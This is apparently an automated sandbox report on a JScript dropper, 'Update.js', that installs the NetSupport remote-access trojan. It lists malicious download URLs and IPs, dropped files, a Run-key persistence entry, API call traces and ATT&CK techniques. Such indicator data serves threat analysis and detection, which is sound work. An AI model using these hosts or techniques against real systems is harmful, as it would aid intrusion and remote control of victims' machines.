Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,11_2_110F37A0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,11_2_11134830
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11147160 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,11_2_11147160
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,11_2_1117594C
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,11_2_11145C70
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,11_2_11070430
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_6F9FA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,11_2_6F9FA980
Source: Yara match | File source: 18.2.client32.exe.6fb60000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.client32.exe.73f40000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.client32.exe.6fb60000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.client32.exe.6fb60000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.client32.exe.73f40000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.0.client32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.client32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.powershell.exe.1c9341746a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.client32.exe.73f40000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.0.client32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.powershell.exe.1c93417e8f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.0.client32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.client32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.client32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.powershell.exe.1c93415dde8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.client32.exe.6f9f0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2436230246.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2437544828.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2518264391.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2516794939.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2317672682.000001C9342A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.2515693268.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2317672682.000001C934153000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.2434122140.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2317672682.000001C93417C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2317672682.000001C933F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2518228905.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2437590353.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2317672682.000001C934171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.2312535683.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: client32.exe PID: 2760, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\pcicapi.dll, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLL, type: DROPPED
MITRE ATT&CK matrix (one row per line, 14 tactic columns; the number in parentheses is the count shown in the matrix for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (32) | Valid Accounts (2) | Windows Management Instrumentation (1) | Scripting (32) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | Input Capture (1) | System Time Discovery (12) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Native API (5) | DLL Side-Loading (1) | Valid Accounts (2) | Obfuscated Files or Information (4) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Screen Capture (1) | Encrypted Channel (21) | Exfiltration Over Bluetooth | Defacement (1)
Email Addresses | DNS Server | Domain Accounts | Exploitation for Client Execution (1) | Valid Accounts (2) | Access Token Manipulation (21) | Software Packing (11) | Security Account Manager | System Service Discovery (1) | SMB/Windows Admin Shares | Input Capture (1) | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Command and Scripting Interpreter (1) | Windows Service (1) | Windows Service (1) | DLL Side-Loading (1) | NTDS | File and Directory Discovery (3) | Distributed Component Object Model | Clipboard Data (3) | Application Layer Protocol (14) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Service Execution (2) | Registry Run Keys / Startup Folder (1) | Process Injection (113) | Masquerading (11) | LSA Secrets | System Information Discovery (44) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | PowerShell (3) | RC Scripts | Registry Run Keys / Startup Folder (1) | Valid Accounts (2) | Cached Domain Credentials | Security Software Discovery (261) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (41) | DCSync | Process Discovery (2) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (21) | Proc Filesystem | Virtualization/Sandbox Evasion (41) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (113) | /etc/passwd and /etc/shadow | Application Window Discovery (11) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | System Owner/User Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
Behavior Graph ID: 1508730 | Sample: Update.js | Start date: 10/09/2024 | Architecture: WINDOWS | Score: 100

Top level (node 2):
  DNS/IP: moneymoj.com; ipva2024-detransp.com; geo.netsupportsoftware.com
  Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 8 other signatures
  Started: wscript.exe [1 1] (node 8); svchost.exe [1 1] (node 12); client32.exe (node 14); client32.exe (node 16)

wscript.exe (node 8):
  DNS/IP: moneymoj.com 8.39.147.104, 443, 49718, CFA-INSTITUTEUS, United States
  Signatures: System process connects to network (likely due to code injection or exploit); JScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; 3 other signatures
  Started: powershell.exe [15 37] (node 18)

svchost.exe (node 12):
  DNS/IP: 127.0.0.1, unknown, unknown

powershell.exe (node 18):
  DNS/IP: ipva2024-detransp.com 79.141.161.172, 443, 49733, HZ-US-ASBG, Bulgaria
  Dropped: C:\Users\user\AppData\...\remcmdstub.exe (PE32); C:\Users\user\AppData\Roaming\...\pcicapi.dll (PE32); C:\Users\user\AppData\...\client32.exe (PE32); 6 other files (5 malicious)
  Signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
  Started: client32.exe [17] (node 23); conhost.exe (node 27)

client32.exe (node 23):
  DNS/IP: 5.181.159.137, 443, 49735, MIVOCLOUDMD, Moldova Republic of; geo.netsupportsoftware.com 104.26.1.231, 49736, 80, CLOUDFLARENETUS, United States
  Signatures: Multi AV Scanner detection for dropped file; Contains functionality to change the wallpaper; Delayed program exit found; Contains functionality to detect sleep reduction / modifications

Source | Detection | Scanner | Label | Link
Update.js | 0% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL | 13% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLL | 5% | ReversingLabs | |
C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLL | 17% | ReversingLabs | |
C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLL | 6% | ReversingLabs | |
C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | 27% | ReversingLabs | Win32.Trojan.NetSupport |
C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\msvcr100.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\pcicapi.dll | 3% | ReversingLabs | |
C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\remcmdstub.exe | 24% | ReversingLabs | Win32.Trojan.Generic |
                                No Antivirus matches
                                No Antivirus matches
Source | Detection | Scanner | Label | Link
https://ipva2024-detransp.com/data.php?6891 | 100% | Avira URL Cloud | phishing |
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p | 0% | Avira URL Cloud | safe |
http://5.181.159.137/fakeurl.htm | 0% | Avira URL Cloud | safe |
https://www.google.com/intl/en-US/chrome/blank.html | 0% | Avira URL Cloud | safe |
http://geo.netsupportsoftware.com/location/loca.asp | 0% | Avira URL Cloud | safe |
http://%s/fakeurl.htm | 0% | Avira URL Cloud | safe |
https://www-googleapis-staging.sandbox.google.com | 0% | Avira URL Cloud | safe |
http://127.0.0.1 | 0% | Avira URL Cloud | safe |
https://moneymoj.com/cdn-vs/update.php?88 | 100% | Avira URL Cloud | malware |
http://%s/testpage.htm | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geo.netsupportsoftware.com | 104.26.1.231 | true | false | | unknown
ipva2024-detransp.com | 79.141.161.172 | true | true | | unknown
moneymoj.com | 8.39.147.104 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://moneymoj.com/cdn-vs/update.php?88 | true | Avira URL Cloud: malware | unknown
http://geo.netsupportsoftware.com/location/loca.asp | false | Avira URL Cloud: safe | unknown
https://ipva2024-detransp.com/data.php?6891 | true | Avira URL Cloud: phishing | unknown
http://5.181.159.137/fakeurl.htm | true | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p | wscript.exe, 00000000.00000003.2156349259.000001D0C871D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215978446.000001D0CD042000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210321815.000001D0CD165000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211492021.000001D0CD18F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213825621.000001D0CD182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214536981.000001D0CD1A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209630899.000001D0CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209860589.000001D0CD26D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210803679.000001D0CD041000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215539051.000001D0CD1A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214982606.000001D0CD04C000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://www.google.com/intl/en-US/chrome/blank.html | wscript.exe, 00000000.00000003.2210442052.000001D0CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213461332.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211630069.000001D0CD04E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155218710.000001D0C7F22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213566215.000001D0CD192000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209113379.000001D0CD044000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2212871998.000001D0CD187000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215778459.000001D0CD30A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210931576.000001D0CD168000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2160028757.000001D0C9611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214379787.000001D0CD04E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210203440.000001D0CD043000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213173128.000001D0CD182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214676945.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211789508.000001D0CD18A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210554221.000001D0CD16D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211353920.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213694902.000001D0CD040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215259651.000001D0CD30D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2212052812.000001D0CD046000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213968827.000001D0CD2D4000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://%s/testpage.htm | client32.exe | false | Avira URL Cloud: safe | unknown
http://127.0.0.1 | client32.exe | false | Avira URL Cloud: safe | unknown
https://www-googleapis-staging.sandbox.google.com | wscript.exe, 00000000.00000003.2210442052.000001D0CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213461332.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2160355900.000001D0C75F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2208938952.000001D0CCCC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211630069.000001D0CD04E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155218710.000001D0C7F22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213566215.000001D0CD192000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209113379.000001D0CD044000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2212871998.000001D0CD187000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215778459.000001D0CD30A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210931576.000001D0CD168000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214379787.000001D0CD04E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210203440.000001D0CD043000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213173128.000001D0CD182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214676945.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211789508.000001D0CD18A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210554221.000001D0CD16D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211353920.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 
00000000.00000003.2213694902.000001D0CD040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215259651.000001D0CD30D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2212052812.000001D0CD046000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://%s/fakeurl.htmclient32.exefalse
                                      • Avira URL Cloud: safe
                                      unknown
IP | Domain | Country | ASN | ASN Name | Malicious
79.141.161.172 | ipva2024-detransp.com | Bulgaria | 202015 | HZ-US-ASBG | true
5.181.159.137 | unknown | Moldova Republic of | 39798 | MIVOCLOUDMD | true
104.26.1.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
8.39.147.104 | moneymoj.com | United States | 54024 | CFA-INSTITUTEUS | true
                                      IP
                                      127.0.0.1
                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1508730
                                      Start date and time:2024-09-10 16:32:40 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 9m 11s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:19
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • GSI enabled (Javascript)
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Update.js
                                      Detection:MAL
                                      Classification:mal100.rans.troj.expl.evad.winJS@9/27@3/5
                                      EGA Information:
                                      • Successful, ratio: 66.7%
                                      HCA Information:
                                      • Successful, ratio: 77%
                                      • Number of executed functions: 163
                                      • Number of non-executed functions: 202
                                      Cookbook Comments:
                                      • Found application associated with file extension: .js
                                      • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                      • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net
                                      • Execution Graph export aborted for target powershell.exe, PID 5880 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: Update.js
Time | Type | Description
10:33:41 | API Interceptor | 2x Sleep call for process: wscript.exe modified
10:33:45 | API Interceptor | 42x Sleep call for process: powershell.exe modified
10:34:05 | API Interceptor | 2x Sleep call for process: svchost.exe modified
10:34:21 | API Interceptor | 5966774x Sleep call for process: client32.exe modified
16:33:54 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CJYJHX C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
16:34:02 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CJYJHX C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
Match: 104.26.1.231
Associated Sample Name / URL | Detection | Threat Name | Context
FakturaPDF.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
Update 124.0.6367.158.js | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
Update 124.0.6367.158.js | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
SAPConcur.msix | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
HQuxVxuLV.ps1 | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
Advanced Scanner.exe | malicious | NetSupport RAT, NetSupport Downloader | geo.netsupportsoftware.com/location/loca.asp
R6aeFGF7gU.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
SecureClientInstaller.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
RECH31683168.lnk | malicious | NetSupport RAT, NetSupport Downloader | geo.netsupportsoftware.com/location/loca.asp
IN___502HUSMW9N.LNK.lnk | malicious | NetSupport RAT, NetSupport Downloader | geo.netsupportsoftware.com/location/loca.asp
Match: geo.netsupportsoftware.com
Associated Sample Name / URL | Detection | Threat Name | Context
FakturaPDF.exe | malicious | NetSupport RAT | 104.26.1.231
FakturaPDF.exe | malicious | NetSupport RAT | 172.67.68.212
Update_2762895.msix | malicious | NetSupport RAT | 104.26.1.231
Update_9025289.msix | malicious | NetSupport RAT | 172.67.68.212
JbZaDxFXF3.exe | malicious | NetSupport RAT | 172.67.68.212
update.js | malicious | NetSupport RAT | 104.26.1.231
Update_6529495.msix | malicious | NetSupport RAT | 172.67.68.212
Update_7053228.msix | malicious | NetSupport RAT | 104.26.1.231
Update_5289856.msix | malicious | NetSupport RAT | 104.26.0.231
updates.js | malicious | NetSupport RAT | 104.26.0.231
Match: HZ-US-ASBG
Associated Sample Name / URL | Detection | Threat Name | Context
http://premium.davidabostic.com | malicious | Unknown | 185.33.84.157
http://premium.davidabostic.com | malicious | Unknown | 185.33.84.157
http://premium.davidabostic.com | malicious | Unknown | 185.33.84.157
http://premium.davidabostic.com | malicious | Unknown | 185.33.84.157
https://gift-card-granny10.myfreesites.net/ | malicious | Unknown | 79.141.162.99
Invoices.lnk | malicious | Unknown | 79.141.160.37
Payment_Document.lnk | malicious | Unknown | 79.141.160.37
http://soursejone.com/21dca2f7d5837c09f5.js | malicious | Unknown | 79.141.160.71
http://soursejone.com/21dca2f7d58337c09f5.js | malicious | Unknown | 79.141.160.71
TradingView_setup_IIS.msi | malicious | Unknown | 79.141.160.2

Match: MIVOCLOUDMD
Associated Sample Name / URL | Detection | Threat Name | Context
ZWlwrTM9HK.exe | malicious | Remcos | 5.181.156.117
Gez0dmj6yl.exe | malicious | DCRat | 94.158.244.70
update.js | malicious | NetSupport RAT | 5.181.159.28
17E503AEF3804C0513838FB4AE3E00F323B1260BF753D99DBF0AE415BA54DE11.exe | malicious | Bdaejec, Raccoon | 194.180.191.241
updates.js | malicious | NetSupport RAT | 194.180.191.69
updates.js | malicious | NetSupport RAT | 94.158.245.103
Update 124.0.6367.158.js | malicious | NetSupport RAT | 94.158.245.103
yvM2XCEkGj.exe | malicious | Raccoon Stealer v2 | 5.181.159.42
updates.js | malicious | NetSupport RAT | 94.158.245.103
xUtQLCJLoN.elf | malicious | Gafgyt, Mirai | 94.158.244.72

Match: CFA-INSTITUTEUS
Associated Sample Name / URL | Detection | Threat Name | Context
x.png.ps1 | malicious | Unknown | 8.39.147.42
https://theproduct4you.world/intl/ceci/compl?bhu=CWrKCaLj5Ayfkh9dn499SsEHPRZrHr3s6unAe | malicious | GRQ Scam | 8.39.147.66
https://bit.ly/38hpiGZ | malicious | GRQ Scam | 8.39.147.66
